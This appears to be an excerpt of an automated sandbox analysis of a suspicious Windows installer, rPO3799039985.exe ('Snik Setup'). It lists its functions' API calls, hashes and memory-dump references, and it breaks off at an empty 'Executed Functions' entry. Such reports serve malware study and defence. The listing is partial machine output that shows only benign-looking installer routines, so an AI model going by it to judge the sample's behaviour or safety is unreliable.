                                                                                                                                                                                                          • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                                                                                                                                          Function 00403974 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,Snik Setup), ref: 00403A0C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$1033$Snik Setup$Snik Setup: Completed
                                                                                                                                                                                                          • API String ID: 530164218-3370705221
                                                                                                                                                                                                          • Opcode ID: 993fe79cb263d8704da8179243fb4c9b486514bba0ea53d7ba6abc6d02ddb1fb
                                                                                                                                                                                                          • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 993fe79cb263d8704da8179243fb4c9b486514bba0ea53d7ba6abc6d02ddb1fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                                                                                                                                          Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                          • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                                                                                                                          • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                                                                                                                                          Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                          • Opcode ID: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                                                                                                                                                          • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                                                                                                                                          Function 004057A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                                          • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                                          • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                                                                                                                                          Function 00402364 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00409C10,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1356686001-0
                                                                                                                                                                                                          • Opcode ID: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                                                                                                                                                                          • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                                                                                                                                                                          Function 0040583A Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00405861
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                                          • String ID: C:\
                                                                                                                                                                                                          • API String ID: 3213498283-3404278061
                                                                                                                                                                                                          • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                                                                                                                          • Instruction ID: 19ae957cdd7e66f1aaea138ca2c8f088f7fbe10d55ad18dca4d2112a8e91772d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF0C253904F506EFB3272640C44B775B98CB55390F18C47BED90A62C1827C4C604F9A
                                                                                                                                                                                                          Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                          • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                                                                                                                          • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                                                                                                                                                          Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                                                                                                                                            • Part of subcall function 00403F60: SendMessageA.USER32(000103DC,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                          • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                                                                                                                          • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                                                                                                                                          Function 0040361A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,75083410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040363B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                                                                                          • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                                                                                                                          • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                                                                                                                                                          Function 004057E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPO3799039985.exe,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004057EE
                                                                                                                                                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPO3799039985.exe,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004057FC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                                          • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                                                                                                          • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                                                                                                                                                          Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                          • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                                          • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 0773C936 Relevance: 8.1, Strings: 5, Instructions: 1844COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
